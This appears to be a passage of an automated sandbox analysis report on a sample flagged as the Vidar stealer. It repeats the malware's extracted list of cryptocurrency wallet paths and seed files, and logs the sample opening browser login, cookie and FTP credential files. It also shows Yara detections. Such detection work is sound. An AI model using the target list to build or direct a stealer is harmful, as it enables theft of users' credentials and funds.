Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: um-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: um-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: um-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: um-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: um-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Yara match

File source: Process Memory Space: kat2B07.tmp PID: 204, type: MEMORYSTR

Remote Access Functionality

Yara detected CryptOne packer

Source: Yara match

File source: 00000000.00000002.342512838.0000000002EEB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.82xul16VKj.exe.3080000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.82xul16VKj.exe.2eb7719.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.82xul16VKj.exe.2eb7719.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.82xul16VKj.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.82xul16VKj.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.342253005.00000000002A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 82xul16VKj.exe PID: 2112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: kat2B07.tmp PID: 204, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D745C70 sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,	2_2_1D745C70
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D7B1FE0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_1D7B1FE0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D7ADFC0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_mprintf,sqlite3_bind_text,sqlite3_step,sqlite3_reset,	2_2_1D7ADFC0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D85D9E0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,	2_2_1D85D9E0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D7D5910 sqlite3_mprintf,sqlite3_bind_int64,	2_2_1D7D5910
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D7ADB10 sqlite3_initialize,sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,	2_2_1D7ADB10
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D7D55B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_1D7D55B0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D8514D0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,	2_2_1D8514D0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D85D4F0 sqlite3_bind_value,sqlite3_log,sqlite3_log,sqlite3_log,	2_2_1D85D4F0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D80D610 sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_1D80D610
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D7D51D0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_1D7D51D0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D7C9090 sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_errmsg,sqlite3_mprintf,	2_2_1D7C9090
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D7ED3B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_1D7ED3B0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D814D40 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,	2_2_1D814D40
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D768CB0 sqlite3_bind_zeroblob,	2_2_1D768CB0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D760FB0 sqlite3_result_int64,sqlite3_result_double,sqlite3_result_int,sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,	2_2_1D760FB0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D768970 sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	2_2_1D768970
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D744820 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_initialize,	2_2_1D744820
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D788550 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,	2_2_1D788550
